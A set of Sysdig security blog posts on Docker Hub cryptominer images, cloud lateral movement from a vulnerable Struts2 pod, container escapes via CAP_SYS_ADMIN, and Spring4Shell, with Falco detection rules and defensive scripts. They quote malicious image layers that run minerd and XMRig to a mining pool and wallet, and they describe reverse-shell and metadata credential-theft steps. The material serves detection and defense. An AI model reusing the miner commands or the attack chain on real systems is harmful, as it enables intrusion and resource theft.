Inspecting the layers of these images verifies that they are cryptominers. Indeed, these are some of their layers.

…cut
/bin/sh -c git clone https://github.com/OhGodAPet/cpuminer-multi
…cut
ENTRYPOINT ["/bin/minerd" "-a" "cryptonight" "-o" "stratum+tcp://xmr.pool.minergate.com:45560" "-u" "XXXXX@XXXXXX.com" "-p" "x" "-t" "1"]

Image layers can be explored directly on Docker Hub. For instance, the layers of ynprpagamentitk/liferay are accessible at this URL.

Interestingly, those images were published by different users but all of them contain the same layers, meaning that they most likely belong to the same threat actor or are following an attacker playbook. Also, every one of those users published only one image, making it harder to track this threat actor. The repository cloned in the first of the previous layers no longer exists, but its name strongly suggests it was a mining tool. Also, the GitHub user OhGodAPet is still active and has forked several repositories of mining tools.

In the last of the previous layers, the malicious image executes the “minerd” binary with some parameters, including the miner URL “stratum+tcp://xmr.pool.minergate.com:45560.”

The number of downloads for each image shows that hundreds of users were tricked into pulling images that they thought were legitimate, without knowing that those images were miners.

Sysdig TRT found another user, vibersastra, who joined Docker Hub on July 31, 2022 and uploaded exclusively disguised images, in particular:

Malicious Images Impersonating Legitimate Software

By looking at the layers, it is clear that those images download the XMRig miner tool and then use it to mine Monero toward the owner’s wallet, as shown below:

…cut
RUN /bin/sh -c git clone --branch "v6.17.0" https://github.com/xmrig/xmrig # buildkit
…cut
RUN /bin/sh -c chmod +x /xmrig/build/xmrig.sh # buildkit
…cut
CMD ["--url=pool.hashvault.pro:80" "--user=88XgkSPJV9u28F4SJQtdW6U46RKDHB36aTzeM2f1yWsxTcX8QuSPDbHU1TTXChYpBeh9McphG2GYN77Lhu7jtfvp3HVytgc.featuring" "--algo=rx/0" "--pass=x" "-t 4"]
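The layers shown in this section share a few recognizable strings, which suggests a quick first-pass check on image history. The Python sketch below searches layer commands for markers taken from those examples. The marker list and function name are illustrative assumptions, not a Sysdig detection rule, and a determined attacker can trivially rename binaries or hide pool addresses, so a clean result proves nothing.

```python
# Strings seen in the malicious layers shown above.
MINER_MARKERS = ("stratum+tcp://", "xmrig", "minerd", "cpuminer")


def miner_markers(layer_commands):
    """Return the sorted set of miner-related markers found in the commands."""
    found = set()
    for command in layer_commands:
        lowered = command.lower()
        found.update(marker for marker in MINER_MARKERS if marker in lowered)
    return sorted(found)


# Two of the layers from the first example, abbreviated.
suspicious_layers = [
    "/bin/sh -c git clone https://github.com/OhGodAPet/cpuminer-multi",
    'ENTRYPOINT ["/bin/minerd" "-a" "cryptonight" "-o" '
    '"stratum+tcp://xmr.pool.minergate.com:45560"]',
]
hits = miner_markers(suspicious_layers)
```

A check like this is best used to prioritize images for deeper inspection rather than as a final verdict.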

Mitigation

It’s clear that container images have become a real attack vector, rather than a theoretical risk. The methods employed by malicious actors described by Sysdig TRT are specifically targeted at cloud and container workloads. Organizations deploying such workloads should ensure that they enact appropriate preventative and detective security controls that are capable of mitigating cloud-targeting attacks.

The research conducted here has allowed the Sysdig Threat Research Team to create a feed of known malicious container images based on their SHA-256 digest. By using this feed, Sysdig customers are able to alert whenever any of these containers are seen in their environment and take appropriate response actions. If a known malicious container appears in the environment, it can immediately be killed, paused, or stopped while notifying the security team. Prevention can also be accomplished by integrating the Sysdig TRT feed with an admission controller, which can prevent the deployment of an image based on its digest.
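To illustrate the digest-based blocking idea, here is a minimal sketch of the check an admission step could perform. The function names and the placeholder digests are assumptions made for the example; they do not reflect the actual format of the Sysdig TRT feed or any admission controller API.

```python
import re

DIGEST_RE = re.compile(r"^sha256:[0-9a-f]{64}$")


def normalize_digest(image_ref):
    """Extract the sha256 digest from a reference such as repo/name@sha256:<hex>."""
    digest = image_ref.rsplit("@", 1)[-1].lower()
    if not DIGEST_RE.match(digest):
        raise ValueError(f"no valid sha256 digest in {image_ref!r}")
    return digest


def admit(image_ref, blocklist):
    """Return True if the image may be deployed, False if its digest is blocklisted."""
    return normalize_digest(image_ref) not in blocklist


# Placeholder digests (assumption), not real malicious images.
blocklist = {"sha256:" + "ab" * 32}
print(admit("example/app@sha256:" + "ab" * 32, blocklist))  # False
print(admit("example/app@sha256:" + "cd" * 32, blocklist))  # True
```

Matching on the digest rather than the tag matters here: a tag can be re-pointed to a different image, while a digest identifies the exact image content.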

Final words

Much of the software used today depends on numerous other software packages. The origin of these dependencies is extremely varied, with some being produced and supported by major corporations, while others are developed by unknown parties who may not be supporting their projects anymore.

This notion of sharing code has also spread to containers, where people can easily share their container-based creations on sites like Docker Hub. This has made testing and deploying entire platforms very easy, but has also increased the risk of using something malicious. Threat actors are placing malware into shared containers, hoping users will download and run them on their infrastructure. The malware installed can be anything from cryptominers to backdoors to tools that will automatically exfiltrate data.

It is more important than ever to understand and monitor what happens in your organization’s containerized environments.

Want more? Download the full 2022 Sysdig Cloud-Native Threat Report.

The post Analysis on Docker Hub malicious images: Attacks through public container images appeared first on Sysdig.

Cloud lateral movement: Breaking in through a vulnerable container

Stefano Chierici — Mon, 25 Jul 2022 10:00:20 +0000

Lateral movement is a growing concern with cloud security. That is, once a piece of your cloud infrastructure is compromised, how far can an attacker reach?

In well-known attacks on cloud environments, a vulnerable, publicly available application often serves as the entry point. From there, attackers try to move inside the cloud environment to exfiltrate sensitive data or use the account for their own purposes, like crypto mining.

In this article, we’ll introduce a staged, but real-world scenario to showcase how it would be possible for an attacker to get full access to a cloud account. We’ll also cover how to detect and mitigate this kind of attack by using Sysdig Cloud Connector.

The scenario for lateral movement

Let’s start this cloud security exercise with a vulnerable Struts2 application, running in a Kubernetes cluster and hosted inside an AWS account.

Once an attacker gets access to the pod, they will assess the environment looking for secrets or credentials to perform lateral movement and escalate the privileges.

Those credentials can potentially be found in the AWS instance metadata. Once obtained, the attacker will have access to the AWS account, and from there they can start poking around.

Having access to the cloud infrastructure, the attacker will look for misconfigurations that would enable their next actions, such as solidifying their position by persisting their permissions, impairing the cloud defenses, or escalating their privileges. Ultimately, the attacker can cause harm by looking for data to exfiltrate, or by installing a crypto miner or bot control center.

Now that we understand the overall strategy of our adversary, let’s dig deeper into their actions.

Step 1: Exploiting a public facing web application

One of the Initial Access TTPs (tactics, techniques, and procedures) listed in the MITRE ATT&CK Cloud Matrix is Exploit Public-Facing Application. It makes sense. After all, anything public is already accessible.

In this scenario, there is an Apache Struts2 application publicly available.

To see if the available instance is affected by well-known vulnerabilities, attackers start with passive and active information gathering. By interacting with the web application, it is possible to retrieve software versions and other information about the deployed application. From there, the attacker can query vulnerability databases looking for an entry point.

The attacker discovers that the Apache Struts2 version we are using is vulnerable to CVE-2020-17530, which permits remote code execution on the machine. If the attacker manages to exploit this particular vulnerability, they will be able to execute arbitrary code on the machine, including opening a reverse shell within the system.

The attacker sends a crafted HTTP request to the server, and voilà, a shell opens from the victim host to an attacker machine.

The bash command required to open the reverse shell contains special characters, which could cause errors during the execution. To avoid this, it is common to encode the command in base64, decoding it during the execution.
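The encoding step is simple to reproduce, and knowing how to reverse it is useful when analyzing suspicious command lines. The sketch below uses a harmless placeholder command (an assumption, not the command from the scenario) to show that the encoded form contains none of the original special characters.

```python
import base64

# Harmless placeholder command (assumption); the special characters are what matter.
command = "echo 'hello' | tr a-z A-Z > /tmp/out.txt"

encoded = base64.b64encode(command.encode("utf-8")).decode("ascii")
decoded = base64.b64decode(encoded).decode("utf-8")

# The encoded form only uses the base64 alphabet: letters, digits, '+', '/', '='.
print(encoded)
print(decoded == command)  # True
```

For defenders, a long base64 string in a request or process command line is often worth decoding during an investigation.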

From the hostname, apache-struts-6c8974d494, the attacker can see they landed in a pod or container inside a Kubernetes Cluster.

Step 2: Lateral movement to the cloud

Now that our adversary is in, they have to survey the terrain. You may think that having landed in a container, the attacker is fairly restricted. And you would be correct, but they still have some options to compromise our cloud security.

The attacker checks if the pod has access to the AWS instance metadata.

It looks like it does. There might be useful information regarding the cloud environment that would help the attacker escalate privileges or perform lateral movement.

Looking at the IAM credentials, the adversary finds the AWS IAM role credentials associated with the Kubernetes node where the pod is running.

The attacker can now import the credentials into their own environment and have direct access to the cloud account via the AWS CLI.

Step 3: Privilege escalation via policy misconfiguration

At this point, the attacker is able to connect to the AWS account with the stolen credentials.

The first thing they do is start evaluating the roles and policies attached to the impersonated role, trying to find a way to escalate privileges inside the cloud environment.

That devAssumeRole policy looks promising. Let’s see what permissions it grants.

With the AssumeRole, the adversary has the option to act as other users. This is a weird permission to grant to an account like this one. It’s likely a misconfiguration, the kind the attacker was looking for.

Also, with the ReadOnlyAccess privilege, the attacker is able to enumerate the roles available in the AWS account and find which of those they can assume based on the restrictions in place. In this case, the attacker can impersonate roles whose names start with “dev.” One of the roles the current user can assume is dev-EC2Full, which permits full control over EC2 instances.
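The same enumeration is useful for auditing. Here is a minimal sketch of how a wildcard Resource pattern in an AssumeRole policy narrows down the roles that can be assumed. The account ID, the pattern, and all role names except dev-EC2Full are hypothetical, and Python's fnmatchcase only approximates IAM wildcard matching (it also gives special meaning to square brackets, which IAM does not).

```python
from fnmatch import fnmatchcase


def assumable_roles(role_arns, resource_pattern):
    """Return the role ARNs that match an IAM-style wildcard Resource pattern."""
    return [arn for arn in role_arns if fnmatchcase(arn, resource_pattern)]


# Hypothetical values for illustration; only dev-EC2Full appears in the article.
pattern = "arn:aws:iam::123456789012:role/dev*"
roles = [
    "arn:aws:iam::123456789012:role/dev-EC2Full",
    "arn:aws:iam::123456789012:role/prod-Admin",
    "arn:aws:iam::123456789012:role/dev-ReadLogs",
]

print(assumable_roles(roles, pattern))
```

Running this kind of check against your own policies shows how far a single wildcard reaches before an attacker finds out.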

Assuming this role, the attacker is able to act like a dev user, who has full access over EC2 instances, with the ability to create new instances for their own purpose.

Next steps

Let’s recap what we have discussed so far and the two main flaws:

A vulnerable public-facing application is running in a Kubernetes production environment. The attacker uses it as an entry point to the environment.
A dev-related IAM policy is misconfigured and attached to a production entity (an EC2 instance running a Kubernetes node). This allows the attacker to assume a more powerful role and escalate privileges inside the cloud environment.

At this point, the attacker has enough permissions to cause harm to our organization. They could start acting now, or further try to compromise our cloud security and obtain greater access. Don’t miss our “Unified threat detection across AWS cloud and containers” article for a more comprehensive view on the following steps our attacker could take, and see what tools AWS offers to prevent, detect, and mitigate these attacks.

Detecting a lateral movement attack using Sysdig Secure

Fortunately, these kinds of attacks leave a very recognizable track. For example, a reverse shell is something unusual and a runtime security tool can easily raise an alarm. Additionally, security tools can flag misconfigurations. With the right tools, you can strengthen your cloud security.

With Sysdig Secure for cloud, let’s see how you are able to detect this attack in each of its steps.

Detecting public-facing web application exploitation

We saw how the attacker was able to exploit a vulnerability, allowing them to open a reverse shell in the victim pod.

By tapping into the system events, Sysdig knows it happened. One of its many out-of-the-box Falco rules was triggered, and an alert was generated:

Thanks to the metadata collected by the Sysdig Agent deployed in the Kubernetes cluster, the alert contains a lot of useful information. Beyond the IPs involved, the alert also includes the cluster name, namespace, and deployment of the pod.

But what happens once the alert has been triggered? How can you investigate the event if the container disappears?

In the runtime policy configuration, you can enable system event captures. This will collect all the system events around the time the policy is triggered.

Then, you can perform a forensic analysis with Sysdig Inspect and learn what the attacker has done in the system.

Detecting the lateral movement to the cloud

We saw how the attacker established a connection with the pod and then gathered information about the cloud environment by reading the AWS instance metadata.

Let’s see those commands, using Sysdig Inspect to analyze the capture done by the policy when the Reverse Shell alert was triggered.

First, we can see the bash script used to open the reverse shell.

And later, we can see a curl command to the internal IP that was used to retrieve the IAM secrets that granted access to the AWS account.

Detecting Cloud malicious behaviours and misconfigurations

Thanks to Sysdig Secure for cloud, security protection extends to the whole cloud environment. Security alerts will be generated in case security issues are detected in the account based on runtime rules already in place. Here’s an example of a security alert the attacker might have triggered assuming the role dev-EC2Full.

During the scenario, we saw the adversary was able to escalate privileges due to a misconfiguration in the environment. What if security teams were able to detect the misconfiguration right after it was applied in the environment?

Using Cloud Connector capabilities, it’s possible to create a custom Falco rule that will generate an alert in case a misconfiguration is applied.

In our case, the misconfiguration was applying a dev-related policy to an instance role that was unrelated to dev. With the custom rule reported here, it’s possible to create detection for this specific scenario.

- rule: "Attach a dev-AssumeRole Policy to a non-dev Role"
  desc: "dev-AssumeRole Policy must be attached to only dev Roles so that only dev users can assume extra roles"
  condition:
    jevt.value[/eventName]="AttachRolePolicy"
    and (not jevt.value[/errorCode] exists)
    and (not jevt.value[/requestParameters/roleName] contains "dev")
    and jevt.value[/requestParameters/policyArn]="arn:aws:iam::720870426021:policy/dev-AssumeRole"
  output:
    "The dev-AssumeRole policy has been attached to a Role (%jevt.value[/requestParameters/roleName]) which is not
     related to dev. requesting IP=%jevt.value[/sourceIPAddress], AWS region=%jevt.value[/awsRegion],
     requesting user=%jevt.value[/userIdentity/arn]"
  priority: "WARNING"
  tags:
    - "cloud"
    - "aws"
  source: "aws_cloudtrail"
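To make the rule's logic easier to follow, here is a rough Python equivalent of its condition, evaluated against a CloudTrail event represented as a dictionary. This is only a sketch for reasoning about the condition, not how Falco evaluates rules. The sample event is hypothetical; the policy ARN is the one used in the rule above.

```python
DEV_POLICY_ARN = "arn:aws:iam::720870426021:policy/dev-AssumeRole"


def is_dev_policy_on_non_dev_role(event):
    """Mirror the rule's condition on a CloudTrail event given as a dict."""
    params = event.get("requestParameters") or {}
    return (
        event.get("eventName") == "AttachRolePolicy"
        and "errorCode" not in event                 # the API call succeeded
        and "dev" not in params.get("roleName", "")  # role is not dev-related
        and params.get("policyArn") == DEV_POLICY_ARN
    )


# Hypothetical event: the role name is an assumption made for the example.
sample_event = {
    "eventName": "AttachRolePolicy",
    "awsRegion": "us-east-1",
    "requestParameters": {
        "roleName": "eks-node-role",
        "policyArn": DEV_POLICY_ARN,
    },
}

print(is_dev_policy_on_non_dev_role(sample_event))  # True
```

Note that, as in the rule, the check is a plain substring match on "dev", so a role named "devops-prod" would be treated as dev-related. Tighten the match if your naming scheme needs it.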

In the screenshot below, you can see the rule was correctly triggered once the user attached the policy to the wrong role, alerting security teams of the misconfiguration in a matter of minutes.

As with the previous security event, we can see how Sysdig Secure for cloud offers plenty of useful information. Thanks to the additional metadata gathered by the connector, the event contains key information regarding the AWS account, the affected object, and the user executing the actions.

Conclusion

The real-life attack scenario we presented shows how it is possible for an adversary to move laterally inside a cloud environment. Such attacks can start from a public-facing, vulnerable container, and can be detected and mitigated using the features in Sysdig Secure.

By leveraging the new Sysdig Secure for cloud, security teams can put together security events related to containers and cloud assets, centralizing threat detection and strengthening cloud security. This can all be done with a single tool, out-of-the-box policies, and no need for further custom integrations.

Our tools make the investigation of security events easier. When it matters most, security teams have all the relevant information in the same place, in a centralized timeline, and with a correlation between events.

Try it yourself!

With Sysdig Secure for cloud, you can continuously flag cloud misconfigurations before the bad guys get in, and detect suspicious activity like unusual logins from leaked credentials. This all happens in a single console, making it easier to validate your cloud security posture. And it only takes a few minutes to get started!

Start securing your cloud for free with our Sysdig Free Tier!

The Sysdig Secure DevOps Platform provides the visibility you need to confidently run containers, Kubernetes, and cloud. It’s built on an open-source stack with SaaS delivery, and is radically simple to run and scale.

Request a free trial today!

The post Cloud lateral movement: Breaking in through a vulnerable container appeared first on Sysdig.

How to detect the containers’ escape capabilities with Falco

Stefano Chierici — Tue, 21 Jun 2022 15:00:41 +0000

Attackers use container escape techniques once they control a container, because escaping greatly increases the impact they can cause. This is why it is a recurring topic in infosec and why it is so important to have tools like Falco to detect it.

Container technologies rely on various features such as namespaces, cgroups, SecComp filters, and capabilities to isolate services running on the same host and apply the least privileges principle.

Capabilities provide a way to limit the level of access a container can have, splitting the power of the root user into more granular units. However, they are often misconfigured, granting excessive privileges to processes and threads.

CVEs published in recent years have shown that those features can be misconfigured, allowing an attacker to escalate privileges inside the container and escape to the host. Here are some container breakout vulnerabilities:

CVE-2022-0847: “Dirty Pipe” Linux Local Privilege Escalation.
CVE-2022-0492: Privilege escalation vulnerability causing container escape.
CVE-2022-0185: Detecting and mitigating Linux Kernel vulnerability causing container escape.
CVE-2019-5736: runc container breakout.
CVE-2022-0811: Arbitrary code execution affecting CRI-O.

In this article, we explain how you can detect and monitor capabilities using Falco, analyzing a well-known container escaping technique.

What are capabilities?

Linux documentation clearly defines capabilities as:

“Starting with kernel 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled. Capabilities are a per-thread attribute.”

As of Linux 5.9, there are 41 capabilities, all listed in the Linux documentation.

In other words, capabilities divide the privileges of the root user into small pieces to grant a thread just enough power to perform specific privileged tasks. If the pieces are small enough and well chosen, then even if a privileged program is compromised, the possible damage is limited by the set of capabilities available to the process.

A diagram which shows the difference between running with default capabilities and with restricted capabilities by Snyk.

Among all capabilities available, the ones worth a special mention are CAP_SYS_ADMIN and CAP_NET_ADMIN, which are very broad and permissive capabilities.

CAP_SYS_ADMIN is required for a wide range of administrative operations, which makes it difficult to drop from containers that perform privileged operations. Due to its broad permissions, it can easily lead to additional capabilities or full root (typically, access to all capabilities).

CAP_NET_ADMIN is required to perform network-related operations such as changing interface configurations, administering the host firewall, and setting promiscuous mode. With this capability too, the potential damage might be huge if the permissions are misused.

In containers, which are isolated environments by definition, the most permissive capabilities are already removed by default. That means if you run a Docker container without specifying additional settings, Docker will use a limited set of capabilities.

So where is the problem?

The key point from the explanation provided before is “small pieces” and this is where the problem begins. Splitting root privileges into small pieces is useful from a security perspective, although we don’t want too many pieces. In addition, the Linux development model doesn’t have a central authority determining how capabilities should be assigned and split.

This confusion brings a lot of doubts and misunderstandings to developers hoping to understand how to proceed. So, lacking sufficient information for a decision, the developer chooses CAP_SYS_ADMIN or similar excessive capabilities for their new feature.

And that brings us to where we are today: CAP_SYS_ADMIN is the new root.

On one hand, the goal of capabilities is to limit the power of privileged programs to be less than root. On the other hand, if we give a program CAP_SYS_ADMIN, the game is more or less over.

In containers, even though a set of capabilities is removed by default, it’s always possible to expand the set by specifying the ones to add when running the container. As we know, containers can also be run directly as privileged and, in this case, the container can use all the capabilities available, CAP_SYS_ADMIN included.

Hands-on CAP_SYS_ADMIN

Here is an easy example. Suppose we want to read the kernel messages exposed via /proc. This operation isn’t allowed if the container runs without extra capabilities. Here is what happens when we run the command.

stefano@stefano falco % docker run -it alpine:latest      
/ # cat /proc/kmsg
cat: can't open '/proc/kmsg': Operation not permitted

Here is what happens if we run the container with CAP_SYS_ADMIN capability instead.

stefano@stefano falco % docker run -it --cap-add CAP_SYS_ADMIN alpine:latest 
/ # cat /proc/kmsg
<4>[6226394.148135] printk: cat (980141): Attempt to access syslog with CAP_SYS_ADMIN but no CAP_SYSLOG (deprecated).

As pointed out in the warning message, we should use the specific capability CAP_SYSLOG to perform this action since it has been created to segregate the permissions from CAP_SYS_ADMIN.

stefano@stefano falco % docker run -it --cap-add CAP_SYSLOG alpine:latest 
/ # cat /proc/kmsg

As you can see, with the right capability we can open the file without any warning message.

Let’s now have a look at another example where CAP_SYS_ADMIN is actually required to perform specific actions. In this example, we use the command unshare, which creates a new namespace; in this case, inside a container. As reported in the command documentation, unshare requires the CAP_SYS_ADMIN capability to work. As before, let’s see what happens when running the command in a container without adding the capability.

stefano@stefano falco % docker run -it alpine:latest      
/ # unshare
unshare: unshare(0x0): Operation not permitted

Here is what happens if we run the container with CAP_SYS_ADMIN capability instead.

stefano@stefano falco % docker run -it --cap-add CAP_SYS_ADMIN alpine:latest 
/ # unshare
3b28503d0205:/#

As you can see in the last example, it was possible to create the new namespace thanks to the extra privileges.

As the last example points out, there are some actions that require CAP_SYS_ADMIN by design. Thus, the only way to see if there are misuses or malicious behaviors is monitoring the capabilities for threads and processes.

Monitoring capabilities using Falco

Thankfully for us, in the new Falco version 0.32 it’s possible to monitor the thread capabilities and be sure that just the allowed capabilities are available.

Three new fields have been added into Falco to accomplish this task:

thread.cap_permitted: superset of capabilities a thread may ever get.
thread.cap_inheritable: set of capabilities that might go in the permitted set after an execve event.
thread.cap_effective: set of capabilities used by the kernel to perform permission checks needed to run.

In this example, we are in a container running with elevated capabilities, and we can easily see the list of capabilities applied. The command cat /proc/self/status shows the capability masks of the current process.

CapInh:	00000000a82425fb
CapPrm:	00000000a82425fb
CapEff:	00000000a82425fb
CapBnd:	00000000a82425fb

Decoding the value 00000000a82425fb with capsh shows the list of capabilities.

capsh --decode=00000000a82425fb
0x00000000a82425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_admin,cap_mknod,cap_audit_write,cap_setfcap
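The mask is simply a bit field in which each bit position corresponds to one capability. As a minimal sketch of what capsh does here, the following Python code decodes the same value. The function names are assumptions made for the example, and the name table follows the numbering in the kernel header linux/capability.h as of Linux 5.9.

```python
# Capability names indexed by bit position, following linux/capability.h.
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID",
    "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]


def decode_caps(mask_hex):
    """Return the capability names whose bits are set in a hex mask."""
    mask = int(mask_hex, 16)
    return [name for bit, name in enumerate(CAP_NAMES) if mask & (1 << bit)]


def parse_status_caps(status_text):
    """Decode every Cap* line of /proc/<pid>/status into a list of names."""
    caps = {}
    for line in status_text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.startswith("Cap"):
            caps[key] = decode_caps(value.strip())
    return caps


effective = decode_caps("00000000a82425fb")
print(" ".join(effective))
print("CAP_SYS_ADMIN" in effective)  # True
```

On a Linux host, passing the contents of /proc/self/status to parse_status_caps gives the decoded sets for the current process.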

Among the others, we can see the famous CAP_SYS_ADMIN.

Having this information available in Falco allows us to create detection over those capabilities and raise alerts if misconfigured capabilities are applied in our environment.

Detecting container escaping with Falco

In this scenario, we see a well-known container escaping technique which relies on cgroup v1 virtual filesystem and, big surprise, CAP_SYS_ADMIN.

The exploitation has been presented in this blog. In order to perform the escaping, we need the following:

We must be running as root inside the container.
The container must be run with the CAP_SYS_ADMIN Linux capability.
The container must lack an AppArmor profile, or otherwise allow the mount syscall.
The cgroup v1 virtual filesystem must be mounted read-write inside the container.

In particular, cgroup v1 relies on two files, notify_on_release and release_agent, which are used in the exploitation to execute commands as root and escape the container. Those files are also used in other exploits that pursue the same goal: escalating privileges and breaking the isolation.

One very recent example is the CVE-2022-0492.

If your container has this capability and this was not detected when the container was created, there is a last line of defense: runtime security with Falco.

Using Falco and the new visibility into the capabilities available to a thread, we are able to detect if the file release_agent is opened and modified by a thread which has excessive capabilities. In this case, we check if the thread explicitly contains CAP_SYS_ADMIN in its set of effective capabilities.

- rule: Detect release_agent File Container Escapes
  desc: "This rule detects an attempt to exploit a container escape using release_agent file. By running a container with certain capabilities, a privileged user can modify release_agent file and escape from the container"
  condition:
    open_write and container and fd.name endswith release_agent and (user.uid=0 or thread.cap_effective contains CAP_DAC_OVERRIDE) and thread.cap_effective contains CAP_SYS_ADMIN
  output:
    "Detect an attempt to exploit a container escape using release_agent file (user=%user.name user_loginuid=%user.loginuid filename=%fd.name %container.info image=%container.image.repository:%container.image.tag cap_effective=%thread.cap_effective)"
  priority: CRITICAL
  tags: [container, mitre_privilege_escalation, mitre_lateral_movement]

Thanks to this rule, we can create a strong and noiseless detection for all the techniques that use release_agent and excessive capabilities to break container isolation and compromise the entire node.

10:11:27.415074914: Critical Detect an attempt to exploit a container escape using release_agent file (user= user_loginuid=-1 filename=/tmp/cgrp/release_agent cool_williamson (id=8ed46a770162) image=ubuntu:latest cap_effective=CAP_CHOWN CAP_DAC_OVERRIDE CAP_FOWNER CAP_FSETID CAP_KILL CAP_SETGID CAP_SETUID CAP_SETPCAP CAP_NET_BIND_SERVICE CAP_NET_RAW CAP_SYS_CHROOT CAP_SYS_ADMIN CAP_MKNOD CAP_AUDIT_WRITE CAP_SETFCAP)

Conclusions

Capabilities provide a way to isolate containers although, as we have seen, misconfiguration and excessive capabilities are often part of new CVEs and they might cause significant security issues.

With a tool like Falco, it’s possible to monitor when specific capabilities like CAP_SYS_ADMIN are misused. Using the new Falco fields in rules, it’s now possible to raise security alerts and get flagged when these malicious behaviors happen in your environment.

After that, if you would like to find out more about Falco:

Get started at Falco.org.
Check out the Falco project on GitHub.
Get involved with the Falco community.
Meet the maintainers on the Falco Slack.
Follow @falco_org on Twitter.

The post How to detect the containers’ escape capabilities with Falco appeared first on Sysdig.

Critical Vulnerability in Spring Core: CVE-2022-22965 a.k.a. Spring4Shell

Stefano Chierici — Thu, 31 Mar 2022 15:34:33 +0000

After the Spring Cloud vulnerability reported yesterday, a new vulnerability called Spring4Shell (CVE-2022-22965) was reported in Spring Core, part of the very popular Java framework Spring, on JDK 9+.

The vulnerability is again a remote code execution (RCE), which would permit attackers to execute arbitrary code on the machine and compromise the entire host.

The affected versions are the following:

5.3.0 to 5.3.17
5.2.0 to 5.2.19
Older, unsupported versions

In this article, we’ll clarify the difference between the two vulnerabilities, CVE-2022-22963 and CVE-2022-22965 (Spring4Shell), and show how the new vulnerability can be exploited and how to mitigate it using Sysdig.

What is going on with Spring

You may have seen a lot of hype during the last 48 hours regarding Spring and Spring Framework. Some clarification of what is going on is needed to make sure you understand and mitigate the right risks and vulnerabilities.

What happened with Spring cloud – CVE-2022-22963

As we reported yesterday, the new CVE-2022-22963 specifically hits Spring Cloud, permitting the execution of arbitrary code on the host or container.

The vulnerability can also impact serverless functions, like AWS Lambda or Google Cloud Functions, since the framework allows developers to write cloud-agnostic functions using Spring features.

What is CVE-2022-22965 aka Spring4shell?

A new vulnerability was found in Spring Core on JDK9+ allowing a remote code execution, like what previously happened on log4j and Spring cloud. This vulnerability is referenced as Spring4shell.

The Spring Framework is a famous open-source framework used to easily build Java applications. One of the main components is Spring Core, which is among the fundamental parts of the framework. The vulnerability takes advantage of an issue in this part to execute arbitrary code on the host or container.

In this case, using certain configurations, it’s possible for an attacker to send a sequence of crafted HTTP requests to exploit the vulnerability.

It’s important to highlight that Spring4shell and CVE-2022-22963 are two different vulnerabilities affecting two different components.

The CVE-2022-22965 Spring4shell issue

Updated: The Spring4Shell is a critical vulnerability that exploits class injection leading to a complete RCE.

In particular, the vulnerability affects functions that use the RequestMapping annotation and POJO (Plain Old Java Object) parameters. Spring uses the POJO’s setters and getters to set and get the values of specific parameters.

Thus, once the project is compiled and hosted on Tomcat, a specific sequence of curl commands can modify Tomcat’s logging properties. Consequently, it is possible to upload a webshell to the Tomcat root directory.

Once uploaded, the webshell can allow attackers to run arbitrary commands on the impacted machine. For more information, look at the PoC here: https://github.com/craig/SpringCore0day.

In order to exploit the vulnerability, the following requirements must be met:

JDK 9 or higher
Apache Tomcat as the Servlet container
Packaged as WAR
spring-webmvc or spring-webflux dependency

The impact of CVE-2022-22965 Spring4shell

According to the CVSSv3 system, it scores as CRITICAL severity.

This type of vulnerability has a high impact on confidentiality, integrity, and availability. Combined with its ease of exploitation, this makes it critical for all users of the framework.

To learn more about how a vulnerability score is calculated, see Are Vulnerability Scores Tricking You? Understanding the severity of CVSS and using them effectively.

However, as we have seen, several requirements must be met in order to successfully exploit the vulnerability.

By exploiting the vulnerability, an attacker can achieve total compromise of the host or container by executing arbitrary commands.

How to detect and mitigate CVE-2022-22965

If you’re impacted by CVE-2022-22965, you should update the application to the versions:

5.3.18+
5.2.20+
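The version ranges above translate into a simple check. The sketch below is an illustration only: the function names are assumptions, and it treats every release line older than 5.2 as affected, following the “Older, unsupported versions” entry in the affected list. An image scanner remains the reliable way to find the vulnerable package.

```python
def parse_version(version):
    """Turn '5.3.17' into (5, 3, 17); suffixes such as '.RELEASE' are ignored."""
    parts = []
    for piece in version.split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    return tuple(parts)


def is_affected(version):
    """Return True if a Spring Framework version falls in the affected ranges."""
    v = parse_version(version)
    if len(v) < 3:
        raise ValueError(f"expected major.minor.patch, got {version!r}")
    if v[:2] == (5, 3):
        return v < (5, 3, 18)  # fixed in 5.3.18
    if v[:2] == (5, 2):
        return v < (5, 2, 20)  # fixed in 5.2.20
    # Assumption: anything older than 5.2 is unsupported and treated as affected.
    return v < (5, 2, 0)


for candidate in ("5.3.17", "5.3.18", "5.2.19.RELEASE", "5.2.20.RELEASE"):
    print(candidate, is_affected(candidate))
```

A version check only tells you the library is present in a vulnerable release. Whether it is exploitable still depends on the requirements listed earlier (JDK 9+, Tomcat, WAR packaging, and the spring-webmvc or spring-webflux dependency).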

As we have seen for the previous CVE-2022-22963, we can detect this vulnerability at three different phases of the application lifecycle:

Build process: With an image scanner.
Deployment process: Thanks to an image scanner on the admission controller.
Runtime detection: With a runtime detection engine like Falco, to detect malicious behaviors in already deployed hosts or pods.

Let’s now dig deeper into each of them.

Using Sysdig scanning, it’s possible to detect the vulnerable package.

Implementing image scanning on the admission controller, it is possible to admit only the workload images that are compliant with the scanning policy to run in the cluster.

